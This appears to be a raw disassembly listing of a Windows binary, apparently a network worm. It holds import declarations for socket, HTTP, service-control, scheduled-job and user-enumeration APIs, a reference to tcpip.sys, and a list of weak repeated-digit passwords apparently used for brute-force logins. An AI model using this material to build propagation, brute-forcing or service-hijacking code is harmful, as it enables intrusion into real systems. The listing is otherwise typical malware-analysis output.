; BOOL __stdcall GetMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax)
extrn GetMessageA:dword ; CODE XREF: sub_9AB0A3+A5�p
; DATA XREF: sub_9AB0A3+7D�r
; BOOL __stdcall TranslateMessage(const MSG *lpMsg)
extrn TranslateMessage:dword ; CODE XREF: sub_9AB0A3+8E�p
; DATA XREF: sub_9AB0A3+8E�r
; int __stdcall LoadStringA(HINSTANCE hInstance, UINT uID, LPSTR lpBuffer, int cchBufferMax)
extrn LoadStringA:dword ; CODE XREF: sub_9AB2C3+29�p
; DATA XREF: sub_9AB2C3+29�r
;
; Imports from version.dll
;
; BOOL __stdcall VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen)
extrn __imp_VerQueryValueA:dword ; DATA XREF: VerQueryValueA�r
; DWORD __stdcall GetFileVersionInfoSizeA(LPCSTR lptstrFilename, LPDWORD lpdwHandle)
extrn __imp_GetFileVersionInfoSizeA:dword
; DATA XREF: GetFileVersionInfoSizeA�r
; BOOL __stdcall GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)
extrn __imp_GetFileVersionInfoA:dword ; DATA XREF: GetFileVersionInfoA�r
;
; Imports from wininet.dll
;
; HINTERNET __stdcall InternetOpenUrlA(HINTERNET hInternet, LPCSTR lpszUrl, LPCSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwFlags, DWORD dwContext)
extrn InternetOpenUrlA:dword ; CODE XREF: sub_9ABAC6+7B�p
; sub_9AD993+64�p
; DATA XREF: ...
; BOOL __stdcall HttpQueryInfoA(HINTERNET hRequest, DWORD dwInfoLevel, LPVOID lpBuffer, LPDWORD lpdwBufferLength, LPDWORD lpdwIndex)
extrn HttpQueryInfoA:dword ; CODE XREF: sub_9ABAC6+B0�p
; sub_9AD993+93�p ...
; BOOL __stdcall InternetGetConnectedState(LPDWORD lpdwFlags, DWORD dwReserved)
extrn InternetGetConnectedState:dword ; CODE XREF: StartAddress+1F0�p
; sub_9A9580+25�p ...
; BOOL __stdcall InternetReadFile(HINTERNET hFile, LPVOID lpBuffer, DWORD dwNumberOfBytesToRead, LPDWORD lpdwNumberOfBytesRead)
extrn InternetReadFile:dword ; CODE XREF: sub_9ABAC6+11E�p
; DATA XREF: sub_9ABAC6+11E�r
; HINTERNET __stdcall InternetOpenA(LPCSTR lpszAgent, DWORD dwAccessType, LPCSTR lpszProxy, LPCSTR lpszProxyBypass, DWORD dwFlags)
extrn InternetOpenA:dword ; CODE XREF: sub_9ABAC6+5A�p
; sub_9AD993+4B�p
; DATA XREF: ...
; BOOL __stdcall InternetCloseHandle(HINTERNET hInternet)
extrn InternetCloseHandle:dword ; CODE XREF: sub_9ABAC6+133�p
; sub_9ABAC6+13C�p ...
;
; Imports from ws2_32.dll
;
; int __stdcall listen(SOCKET s, int backlog)
extrn listen:dword ; CODE XREF: sub_9AEAF7+79�p
; DATA XREF: sub_9AEAF7+79�r
; SOCKET __stdcall accept(SOCKET s, struct sockaddr *addr, int *addrlen)
extrn accept:dword ; CODE XREF: sub_9AEAF7+ED�p
; DATA XREF: sub_9AEAF7+ED�r
; int __stdcall sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen)
extrn sendto:dword ; CODE XREF: sub_9B4EE4+12D�p
; DATA XREF: sub_9B4EE4+12D�r
; int __stdcall setsockopt(SOCKET s, int level, int optname, const char *optval, int optlen)
extrn setsockopt:dword ; CODE XREF: sub_9B4EE4+A3�p
; sub_9B4EE4+CC�p
; DATA XREF: ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: StartAddress+1B6�p
; DATA XREF: StartAddress+1B6�r
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_9AEA12+A5�p
; sub_9B4EE4+D7�p
; DATA XREF: ...
; int __stdcall getsockname(SOCKET s, struct sockaddr *name, int *namelen)
extrn getsockname:dword ; CODE XREF: sub_9AE6A2+43�p
; sub_9B3F00+9C�p
; DATA XREF: ...
; int __stdcall shutdown(SOCKET s, int how)
extrn shutdown:dword ; CODE XREF: sub_9AE3FA+291�p
; sub_9AE6A2+34E�p
; DATA XREF: ...
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_9ADD49+8�p
; sub_9B3F00+14�p
; DATA XREF: ...
; u_long __stdcall ntohl(u_long netlong)
extrn __imp_ntohl:dword ; DATA XREF: ntohl�r
; u_long __stdcall ntohl_0(u_long netlong)
extrn __imp_ntohl_0:dword ; CODE XREF: sub_9A8DB4+15�p
; sub_9AB41B+BD�p
; DATA XREF: ...
; int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect:dword ; CODE XREF: sub_9AB9DA+5B�p
; sub_9B3F00+7D�p ...
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_9AB9DA+66�p
; DATA XREF: sub_9AB9DA+66�r
; int __stdcall gethostname(char *name, int namelen)
extrn gethostname:dword ; CODE XREF: sub_9A9072+2F�p
; DATA XREF: sub_9A9072+2F�r
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_9A90FF+1F�p
; sub_9ADD49+19�p ...
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn __imp_inet_addr:dword ; CODE XREF: sub_9A9289+76�p
; sub_9A9289+81�p ...
; u_short __stdcall ntohs(u_short netshort)
extrn ntohs:dword ; CODE XREF: sub_9AB9DA+35�p
; sub_9AEA12+91�p ...
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_9AB41B+E7�p
; sub_9AE3FA+29A�p ...
; int __stdcall send(SOCKET s, const char *buf, int len, int flags)
extrn send:dword ; CODE XREF: sub_9AB936+79�p
; sub_9B3F00+F8�p ...
; int __stdcall select(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, const struct timeval *timeout)
extrn select:dword ; CODE XREF: sub_9AB869+4E�p
; sub_9AB936+50�p ...
; int __stdcall __WSAFDIsSet(SOCKET fd, fd_set *)
extrn __imp___WSAFDIsSet:dword ; DATA XREF: __WSAFDIsSet�r
; int __stdcall ioctlsocket(SOCKET s, __int32 cmd, u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_9AB869+76�p
; sub_9AB9DA+52�p ...
; int __stdcall recv(SOCKET s, char *buf, int len, int flags)
extrn recv:dword ; CODE XREF: sub_9AB869+99�p
; sub_9B4AC0+63�p
; DATA XREF: ...
; void __stdcall WSASetLastError(int iError)
extrn WSASetLastError:dword ; CODE XREF: sub_9AB869+C0�p
; sub_9AB936+9C�p ...
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_9AB41B+31�p
; sub_9AE3FA+23�p ...
; int __stdcall WSAIoctl(SOCKET s, DWORD dwIoControlCode, LPVOID lpvInBuffer, DWORD cbInBuffer, LPVOID lpvOutBuffer, DWORD cbOutBuffer, LPDWORD lpcbBytesReturned, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSAIoctl:dword ; CODE XREF: sub_9AB41B+5D�p
; DATA XREF: sub_9AB41B+5D�r
;
; Imports from ole32.dll
;
; HRESULT __stdcall CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3)
extrn CoInitializeSecurity:dword ; CODE XREF: sub_9A8C1B+31�p
; DATA XREF: sub_9A8C1B+31�r
; HRESULT __stdcall CoCreateInstance(const IID *const rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, const IID *const riid, LPVOID *ppv)
extrn CoCreateInstance:dword ; CODE XREF: sub_9A8C1B+4E�p
; sub_9A8DF5+23�p ...
; void __stdcall CoUninitialize()
extrn CoUninitialize:dword ; CODE XREF: sub_9A8C1B+84�p
; sub_9A8FED+79�p
; DATA XREF: ...
; HRESULT __stdcall CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit)
extrn CoInitializeEx:dword ; CODE XREF: sub_9A8C1B+11�p
; sub_9A8FED+10�p
; DATA XREF: ...
;
; Imports from urlmon.dll
;
; HRESULT __stdcall ObtainUserAgentString(DWORD dwOption, LPSTR pszUAOut, DWORD *cbSize)
extrn __imp_ObtainUserAgentString:dword ; DATA XREF: ObtainUserAgentString�r
; Section 2. (virtual address 00001428)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 0001FBDD ( 130013.)
; Offset to raw data for section: 00000800
; Flags E00000E0: Text Data Bss Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 9A1428h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
; char Name[]
Name dd 1000h, 2 dup(0) ; DATA XREF: sub_9A7170+8E�o
dd 1568h, 1000h, 10A4h
; char[]
dd 2 dup(0) ; DATA XREF: sub_9A7170+53�o
dd 187Ch, 10A4h, 1214h, 2 dup(0)
dd 1EC6h, 1214h, 1228h, 2 dup(0)
dd 1F2Eh
; char dword_9A1474[]
dword_9A1474 dd 1228h, 12D8h, 2 dup(0) ; DATA XREF: sub_9A7170+4D�o
dd 20EAh
; char Str2[]
Str2 db 'Ø' ; DATA XREF: sub_9A722A+73�o
db 12h, 2 dup(0)
dd 12F8h
; char Srch[]
Srch db 8 dup(0) ; DATA XREF: sub_9A7410:loc_9A7487�o
; sub_9A799E+105�o ...
dd 217Ah, 12F8h
; char dword_9A14A0[]
dword_9A14A0 dd 1310h, 2 dup(0) ; DATA XREF: sub_9A74E1:loc_9A7506�o
; sub_9AC33A+5�o
dd 21D8h
; const WCHAR dword_9A14B0
dword_9A14B0 dd 1310h, 1324h, 2 dup(0) ; DATA XREF: sub_9A74E1+2�o
dd 2244h, 1324h, 1330h, 2 dup(0)
dd 227Eh, 1330h, 1344h
; char CommandLine[]
CommandLine dd 2 dup(0) ; DATA XREF: sub_9A752A+132�o
dd 22C4h, 1344h, 1374h, 2 dup(0)
db 90h
db 23h, 2 dup(0)
dd 1374h, 1384h, 2 dup(0)
dd 23DEh
; char Format[]
Format db '„' ; DATA XREF: sub_9A752A+47�o
db 13h, 2 dup(0)
dd 13A0h, 0
dword_9A1520 dd 0 ; DATA XREF: sub_9A7670+A6�o
dd 2466h, 13A0h, 140Ch
; char Source[]
Source db 8 dup(0) ; DATA XREF: sub_9A7670+9D�o
dd 25A6h, 140Ch, 1420h
dword_9A1544 dd 2 dup(0) ; DATA XREF: StartAddress+191�o
; char dword_9A154C[]
dword_9A154C dd 2600h, 1420h ; DATA XREF: StartAddress+187�o
; char byte_9A1554[]
byte_9A1554 db 14h dup(0) ; DATA XREF: StartAddress+17B�o
; sub_9AD71D+19C�o
dd 61766461h, 32336970h, 6C6C642Eh, 7400h, 4F676552h, 4B6E6570h
dd 78457965h
dword_9A1584 dd 57h, 53676552h, 654B7465h, 63655379h, 74697275h
; DATA XREF: StartAddress+174�o
dword_9A1598 dd 79h, 6E65704Fh, 614D4353h ; DATA XREF: StartAddress+168�o
aNagerw db 'nagerW',0 ; DATA XREF: StartAddress+15C�o
align 4
; char pszValue[]
pszValue db 2 dup(0) ; DATA XREF: StartAddress+152�o
dw 6E45h
dd 65536D75h, 63697672h
aEsstatusw db 'esStatusW',0 ; DATA XREF: StartAddress+13F�o
align 4
aOpenservicew db 'OpenServiceW',0
aS_1 db 's',0
align 4
aQueryserviceco db 'QueryServiceConfigW',0
db 0
align 2
aQueryservice_0 db 'QueryServiceConfig2W',0
db '{',0
align 2
aImpersonatelog db 'ImpersonateLoggedOnUser',0
align 4
dd 74696E49h, 696C6169h, 6553657Ah
; char ServiceName[]
ServiceName db 'curityDe' ; DATA XREF: StartAddress:loc_9A78BE�o
aScriptor db 'scriptor',0 ; DATA XREF: sub_9A799E:loc_9A7B75�o
db 'x',0
align 4
aGetlengthsid db 'GetLengthSid',0
aV db 'v',0
align 4
dd 74696E49h
aIalizeacl db 'ializeAcl',0 ; DATA XREF: sub_9A799E:loc_9A7B60�o
align 4
dd 41646441h, 73656363h, 6C6C4173h
; char aOwedace[]
aOwedace db 'owedAce',0 ; DATA XREF: sub_9A799E+1A8�o
; sub_9AA5A0:loc_9AA5A3�o
dd 65530000h, 63655374h
; char aUritydescripto[]
aUritydescripto db 'urityDescriptorDacl',0 ; DATA XREF: sub_9A799E+C6�o
dd 65530000h, 6C694674h, 63655365h, 74697275h, 4179h
dword_9A16A0 dd 65520000h, 65755167h, 61567972h, 4565756Ch, 4178h, 65520000h
; DATA XREF: sub_9A813F+6E�o
dd 65704F67h, 79654B6Eh, 417845h, 65520000h, 74655367h
dd 756C6156h, 41784565h, 0
aRegclosekey db 'RegCloseKey',0
dd 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 64410000h, 7473756Ah, 656B6F54h, 6972506Eh
dd 656C6976h, 736567h, 68430000h, 65676E61h, 76726553h
dd 43656369h, 69666E6Fh, 4167h, 65520000h, 74726576h, 65536F54h
dd 666Ch, 72430000h, 65746165h, 76726553h, 41656369h, 0
aStartservicea db 'StartServiceA',0
align 10h
aOpenscmanagera db 'OpenSCManagerA',0
align 10h
dd 704F0000h, 65536E65h, 63697672h, 4165h, 6C430000h, 5365736Fh
dd 69767265h, 61486563h, 656C646Eh, 0
aControlservice db 'ControlService',0
db 10h
dd 65440000h, 6574656Ch, 76726553h, 656369h, 704F0000h
dd 72506E65h, 7365636Fh, 6B6F5473h, 6E65h, 65470000h, 6B6F5474h
dd 6E496E65h, 6D726F66h, 6F697461h, 6Eh, 6F6C6C41h, 65746163h
dd 49646E41h, 6974696Eh, 7A696C61h, 64695365h, 0
aEqualsid db 'EqualSid',0
align 4
aFreesid db 'FreeSid',0
dd 65520000h, 756E4567h, 79654B6Dh, 577845h, 65520000h
dd 74655367h, 756C6156h, 57784565h, 0
aRegqueryvaluee db 'RegQueryValueExW',0
db ' ',0
align 4
aRegflushkey db 'RegFlushKey',0
dd 65520000h, 65724367h, 4B657461h, 78457965h, 57h, 43676552h
dd 74616572h, 79654B65h, 417845h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 2C50000h, 556C7452h, 6E69776Eh, 3790064h
dd 74696157h, 4D726F46h, 69746C75h, 4F656C70h, 63656A62h
dd 7374h, 79530344h, 6D657473h, 656D6954h, 69466F54h, 6954656Ch
dd 656Dh, 724600F1h, 694C6565h, 72617262h, 1DC0079h, 56746547h
dd 69737265h, 78456E6Fh, 1B70041h, 53746547h, 65747379h
dd 7269446Dh, 6F746365h, 417972h, 6C430032h, 4865736Fh
dd 6C646E61h, 1F20065h, 626F6C47h, 72466C61h, 6565h, 6C4701EBh
dd 6C61626Fh, 6F6C6C41h, 1690063h, 4C746547h, 45747361h
dd 726F7272h, 13C0000h, 43746547h, 65727275h, 7250746Eh
dd 7365636Fh, 37F0073h, 65646957h, 72616843h, 754D6F54h
dd 4269746Ch, 657479h, 654701DBh, 72655674h, 6E6F6973h
dd 25F0000h, 65766F4Dh, 656C6946h, 417845h, 6F4D025Eh
dd 69466576h, 41656Ch, 654701C9h, 6D655474h, 74615070h
dd 4168h, 6C53033Fh, 706565h, 65440082h, 6574656Ch, 656C6946h
dd 2530041h, 6B636F4Ch, 656C6946h, 15C0000h, 46746547h
dd 53656C69h, 657A69h, 72430050h, 65746165h, 656C6946h
dd 3010041h, 45746553h, 726F7272h, 65646F4Dh, 6D0000h
dd 61657243h, 68546574h, 64616572h, 0B70000h, 74697845h
dd 636F7250h, 737365h, 704F0273h, 754D6E65h, 41786574h
dd 10A0000h, 43746547h, 616D6D6Fh, 694C646Eh, 41656Eh
dd 7243005Dh, 65746165h, 6574754Dh, 4178h, 6547010Eh, 6D6F4374h
dd 65747570h, 6D614E72h, 4165h, 65470174h, 646F4D74h, 46656C75h
dd 4E656C69h, 41656D61h, 13D0000h, 43746547h, 65727275h
dd 7250746Eh, 7365636Fh, 644973h, 6944008Ah, 6C626173h
dd 72685465h, 4C646165h, 61726269h, 61437972h, 736C6Ch
dd 65440089h, 65636976h, 6F436F49h, 6F72746Eh, 38C006Ch
dd 74697257h, 6C694665h, 1C70065h, 54746547h, 46706D65h
dd 4E656C69h, 41656D61h, 831500h, 656C6544h, 69466574h
dd 57656Ch, 6547016Bh, 636F4C74h, 69546C61h, 0CC00656Dh
dd 72430053h, 65746165h, 656C6946h, 0CD0057h, 646E6946h
dd 736F6C43h, 0D40065h, 646E6946h, 73726946h, 6C694674h
dd 5765h, 754D0265h, 4269746Ch, 54657479h, 6469576Fh, 61684365h
dd 1110072h, 43746547h, 75706D6Fh, 4E726574h, 57656D61h
dd 3484600h, 6D726554h, 74616E69h, 72685465h, 646165h
dd 6547013Fh, 72754374h, 746E6572h, 65726854h, 64496461h
dd 37B3000h, 74696157h, 53726F46h, 6C676E69h, 6A624F65h
dd 746365h, 655302BFh, 73614C74h, 72724574h, 2400726Fh
dd 6F4D025Ch, 656C7564h, 654E3233h, 0B8007478h, 6F4D025Ah
dd 656C7564h, 69463233h, 747372h, 72430070h, 65746165h
dd 6C6F6F54h, 706C6568h, 6E533233h, 68737061h, 2400746Fh
dd 6553032Eh, 72685474h, 50646165h, 726F6972h, 797469h
dd 69560371h, 61757472h, 6F72506Ch, 74636574h, 1CECC00h
dd 54746547h, 61657268h, 69725064h, 7469726Fh, 13E0079h
dd 43746547h, 65727275h, 6854746Eh, 64616572h, 36E0A00h
dd 74726956h, 466C6175h, 656572h, 6956036Bh, 61757472h
dd 6C6C416Ch, 0D400636Fh, 65470198h, 6F725074h, 64644163h
dd 73736572h, 2427400h, 64616F4Ch, 7262694Ch, 41797261h
dd 176C200h, 4D746547h, 6C75646Fh, 6E614865h, 41656C64h
dd 484400h, 61657243h, 69446574h, 74636572h, 4179726Fh
dd 0D16B00h, 646E6946h, 73726946h, 6C694674h, 1004165h
dd 654701DEh, 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh
dd 416E6Fh, 6547014Ch, 69724474h, 79546576h, 416570h, 65470170h
dd 676F4C74h, 6C616369h, 76697244h, 68007365h, 654701D2h
dd 63695474h, 756F436Bh, 2400746Eh, 75510292h, 50797265h
dd 6F667265h, 6E616D72h, 6F436563h, 65746E75h, 30B0072h
dd 46746553h, 54656C69h, 656D69h, 6547015Eh, 6C694674h
dd 6D695465h, 2030065h, 70616548h, 6F6C6C41h, 19B0063h
dd 50746547h, 65636F72h, 65487373h, 3B007061h, 65480209h
dd 72467061h, 0C4006565h, 655202A4h, 69466461h, 4400656Ch
dd 72500287h, 7365636Fh, 4E323373h, 747865h, 72500285h
dd 7365636Fh, 46323373h, 74737269h, 34BCC00h, 65726854h
dd 32336461h, 7478654Eh, 2798B00h, 6E65704Fh, 65726854h
dd 64006461h, 6854034Ah, 64616572h, 69463233h, 747372h
dd 72430068h, 65746165h, 6F6D6552h, 68546574h, 64616572h
dd 3958B00h, 74697257h, 6F725065h, 73736563h, 6F6D654Dh
dd 3007972h, 6956036Ch, 61757472h, 6C6C416Ch, 7845636Fh
dd 2750F00h, 6E65704Fh, 636F7250h, 737365h, 655202A7h
dd 72506461h, 7365636Fh, 6D654D73h, 79726Fh, 65530305h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 1573400h
dd 46746547h, 41656C69h, 69727474h, 65747562h, 89004173h
dd 6547013Ah, 72754374h, 746E6572h, 65726944h, 726F7463h
dd 0FF004179h, 72430063h, 65746165h, 636F7250h, 41737365h
dd 21A0000h, 65746E49h, 636F6C72h, 4464656Bh, 65726365h
dd 746E656Dh, 21E0000h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 21B0000h, 65746E49h, 636F6C72h
dd 4564656Bh, 61686378h, 65676Eh, 7243004Ch, 65746165h
dd 6E657645h, 4174h, 65530302h, 65764574h, 746Eh, 704F026Ch
dd 76456E65h, 41746E65h, 1BC4000h, 53746547h, 65747379h
dd 6D69546Dh, 706D0065h, 6C642E72h, 6Ch, 74654E57h, 43646441h
dd 656E6E6Fh, 6F697463h, 57326Eh, 4E570000h, 64417465h
dd 6E6F4364h, 7463656Eh, 326E6F69h, 41h, 74654E57h, 636E6143h
dd 6F436C65h, 63656E6Eh, 6E6F6974h, 4132h, 4E570000h, 61437465h
dd 6C65636Eh, 6E6E6F43h, 69746365h, 57326E6Fh, 736D0000h
dd 74726376h, 6C6C642Eh, 0
a_stricmp db '_stricmp',0
align 4
a_initterm db '_initterm',0
align 4
a_adjust_fdiv db '_adjust_fdiv',0
align 4
aCalloc db 'calloc',0
align 4
dd 73730000h, 666E6163h, 0
aMemmove db 'memmove',0
dd 73620000h, 63726165h, 68h, 7362616Ch, 0
dd 6E6973h, 6F6C0000h, 67h, 74727473h, 6B6Fh, 74610000h
dd 696Fh, 775F0000h, 75647363h, 70h, 6E697270h, 6674h
dd 74730000h, 79706372h, 0
aStrchr db 'strchr',0
align 4
dd 74730000h, 706D6372h, 0
aStrcat db 'strcat',0
align 4
dd 63770000h, 72747373h, 0
aMemcpy db 'memcpy',0
align 10h
dd 735F0000h, 776C7274h, 72h, 73727473h, 7274h, 735F0000h
dd 75647274h, 70h, 6E736377h, 797063h, 63770000h, 6E656C73h
dd 0
aMalloc db 'malloc',0
align 4
dd 72660000h, 6565h, 65720000h, 6F6C6C61h, 63h, 63736377h
dd 7461h, 63770000h, 79706373h, 0
aWcscmp db 'wcscmp',0
align 4
dd 656D0000h, 7465736Dh, 0
a_snwprintf db '_snwprintf',0
align 4
dd 656D0000h, 706D636Dh, 0
aStrncat db 'strncat',0
dd 72730000h, 646E61h, 61720000h, 646Eh, 735F0000h, 6972706Eh
dd 66746Eh, 74730000h, 70636E72h, 79h, 72727473h, 726863h
dd 735F0000h, 696E7274h, 706D63h, 74730000h, 6E656C72h
dd 0
a_memicmp db '_memicmp',0
align 2
aNetapi32_dll db 'netapi32.dll',0
align 4
dd 654E0000h, 69704174h, 66667542h, 72467265h, 6565h, 654E0000h
dd 68635374h, 6C756465h, 626F4A65h, 6C6544h, 654E0000h
dd 68635374h, 6C756465h, 626F4A65h, 6D756E45h, 0
aNetschedulejob db 'NetScheduleJobAdd',0
align 4
aNetuserenum db 'NetUserEnum',0
dd 654E0000h, 72655374h, 45726576h, 6D756Eh, 654E0000h
dd 736B5774h, 65476174h, 666E4974h, 6C6F006Fh, 74756165h
dd 642E3233h, 6C6Ch, 61560000h, 6E616972h, 656C4374h, 7261h
dd 61560000h, 6E616972h, 696E4974h, 74h, 46737953h, 53656572h
dd 6E697274h, 67h, 53737953h, 6E697274h, 6E654C67h, 0
aSysallocstring db 'SysAllocString',0
align 4
aRpcrt4_dll db 'rpcrt4.dll',0
align 4
dd 70520000h, 6E694263h, 676E6964h, 6D6F7246h, 69727453h
dd 6942676Eh, 6E69646Eh, 4167h, 70520000h, 72745363h, 42676E69h
dd 69646E69h, 6F43676Eh, 736F706Dh, 4165h, 644E0000h, 696C4372h
dd 43746E65h, 326C6C61h, 0
aRpcbindingfree db 'RpcBindingFree',0
align 4
aShell32_dll_0 db 'shell32.dll',0
dd 48530000h, 53746547h, 65537465h, 6E697474h, 7367h, 48530000h
dd 53746547h, 69636570h, 6F466C61h, 7265646Ch, 68746150h
dd 68730041h, 7061776Ch, 6C642E69h, 6Ch, 65444853h, 6574656Ch
dd 4179654Bh, 0
aShdeletevaluea db 'SHDeleteValueA',0
align 4
dd 74530000h, 72745372h, 5749h, 74530000h, 72745372h, 4149h
dd 72657375h, 642E3233h, 6C6Ch, 65470000h, 73614C74h, 706E4974h
dd 6E497475h, 6F66h, 6F500000h, 654D7473h, 67617373h, 4165h
dd 65470000h, 676C4474h, 6D657449h, 4100h, 6D756E45h, 65726854h
dd 69576461h, 776F646Eh, 73h, 57666544h, 6F646E69h, 6F725077h
dd 65004163h, 69440000h, 74617073h, 654D6863h, 67617373h
dd 49004165h, 65520000h, 74736967h, 6C437265h, 41737361h
dd 0
aCreatewindowex db 'CreateWindowExA',0
dd 65470000h, 73654D74h, 65676173h, 41h, 6E617254h, 74616C73h
dd 73654D65h, 65676173h, 7200h, 64616F4Ch, 69727453h, 41676Eh
dd 73726576h, 2E6E6F69h, 6C6C64h, 65560000h, 65755172h
dd 61567972h, 4165756Ch, 6F00h, 46746547h, 56656C69h, 69737265h
dd 6E496E6Fh, 69536F66h, 41657Ah, 65470000h, 6C694674h
dd 72655665h, 6E6F6973h, 6F666E49h, 69770041h, 656E696Eh
dd 6C642E74h, 6Ch, 65746E49h, 74656E72h, 6E65704Fh, 416C7255h
dd 6100h, 70747448h, 72657551h, 666E4979h, 6D00416Fh, 6E490000h
dd 6E726574h, 65477465h, 6E6F4374h, 7463656Eh, 74536465h
dd 657461h, 6E490000h, 6E726574h, 65527465h, 69466461h
dd 6500656Ch, 6E490000h, 6E726574h, 704F7465h, 416E65h
dd 6E490000h, 6E726574h, 6C437465h, 4865736Fh, 6C646E61h
dd 73770065h, 32335F32h, 6C6C642Eh, 6500h, 7473696Ch, 6E65h
dd 63610000h, 74706563h, 0
aSendto_0 db 'sendto',0
align 10h
dd 65730000h, 636F7374h, 74706F6Bh, 0
aWsastartup db 'WSAStartup',0
a0 db '0',0
align 2
aBind db 'bind',0
a0_0 db '0',0
align 2
aGetsockname db 'getsockname',0
align 4
aShutdown db 'shutdown',0
a2 db '2',0
align 10h
aGethostbyname db 'gethostbyname',0
align 10h
aNtohl db 'ntohl',0
align 4
aNtohl_0 db 'ntohl',0
align 10h
aConnect db 'connect',0
dd 53570000h, 74654741h, 7473614Ch, 6F727245h, 72h, 68746567h
dd 6E74736Fh, 656D61h, 6E690000h, 6E5F7465h, 616F74h, 6E690000h
dd 615F7465h, 726464h, 746E0000h, 73686Fh, 6C630000h, 7365736Fh
dd 656B636Fh, 74h, 646E6573h, 0
aSelect db 'select',0
align 4
dd 5F5F0000h, 46415357h, 53734944h, 7465h, 6F690000h, 736C7463h
dd 656B636Fh, 74h, 76636572h, 0
aWsasetlasterro db 'WSASetLastError',0
dd 6F730000h, 74656B63h, 0
aWsaioctl db 'WSAIoctl',0
align 2
aOle32_dll db 'ole32.dll',0
dd 6F430000h, 74696E49h, 696C6169h, 6553657Ah, 69727563h
dd 7974h, 6F430000h, 61657243h, 6E496574h, 6E617473h, 6563h
dd 6F430000h, 6E696E55h, 61697469h, 657A696Ch, 0
aCoinitializeex db 'CoInitializeEx',0
align 10h
aUrlmon_dll db 'urlmon.dll',0
align 4
db 0
align 2
aObtainuseragen db 'ObtainUserAgentString',0
dd 1Fh dup(0)
stru_9A26A0 _msEH <0FFFFFFFFh, 0, offset sub_9A7CCC> ; DATA XREF: sub_9A7C6F+2�o
; char aDriversTcpip_s[]
aDriversTcpip_s db '\drivers\tcpip.sys',0 ; DATA XREF: sub_9A7E5A+27�o
align 10h
stru_9A26C0 _msEH <0FFFFFFFFh, offset loc_9A7ECA, offset loc_9A7ECE>
; DATA XREF: sub_9A7E5A+5�o
; const CHAR Password
Password db 0 ; DATA XREF: sub_9A7F48+1D�o
; sub_9A8326+9�r ...
align 10h
; char FileName[]
FileName db '\\.\TcpIp_Perf',0 ; DATA XREF: sub_9A7FAE+12F�o
align 10h
; char PrefixString[]
PrefixString db '0',0 ; DATA XREF: sub_9A7FAE+4B�o
; sub_9AC396+32�o ...
align 4
; char aSoftwareMicros[]
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Applets',0
; DATA XREF: sub_9A81C3+C�o
; sub_9A81F5+19�o
; char word_9A2716[]
word_9A2716 dw 0 ; DATA XREF: sub_9A81C3+6�o
; sub_9A81F5+13�o
dword_9A2718 dd 706967h, 2 dup(39393939h), 0 ; DATA XREF: .text:009B93F0�o
a9999999 db '9999999',0 ; DATA XREF: .text:009B93EC�o
a999999 db '999999',0 ; DATA XREF: .text:009B93E8�o
align 4
a99999 db '99999',0 ; DATA XREF: .text:009B93E4�o
align 10h
a9999 db '9999',0 ; DATA XREF: .text:009B93E0�o
align 4
a999 db '999',0 ; DATA XREF: .text:009B93DC�o
a99 db '99',0 ; DATA XREF: .text:009B93D8�o
align 10h
a9: ; DATA XREF: .text:009B93D4�o
unicode 0, <9>,0
a88888888 db '88888888',0 ; DATA XREF: .text:009B93D0�o
align 10h
a8888888 db '8888888',0 ; DATA XREF: .text:009B93CC�o
a888888 db '888888',0 ; DATA XREF: .text:009B93C8�o
align 10h
a88888 db '88888',0 ; DATA XREF: .text:009B93C4�o
align 4
a8888 db '8888',0 ; DATA XREF: .text:009B93C0�o
align 10h
a888 db '888',0 ; DATA XREF: .text:009B93BC�o
a88 db '88',0 ; DATA XREF: .text:009B93B8�o
align 4
a8: ; DATA XREF: .text:009B93B4�o
unicode 0, <8>,0
a77777777 db '77777777',0 ; DATA XREF: .text:009B93B0�o
align 4
a7777777 db '7777777',0 ; DATA XREF: .text:009B93AC�o
a777777 db '777777',0 ; DATA XREF: .text:009B93A8�o
align 4
a77777 db '77777',0 ; DATA XREF: .text:009B93A4�o
align 10h
a7777 db '7777',0 ; DATA XREF: .text:009B93A0�o
align 4
a777 db '777',0 ; DATA XREF: .text:009B939C�o
a77 db '77',0 ; DATA XREF: .text:009B9398�o
align 10h
a7: ; DATA XREF: .text:009B9394�o
unicode 0, <7>,0
a66666666 db '66666666',0 ; DATA XREF: .text:009B9390�o
align 10h
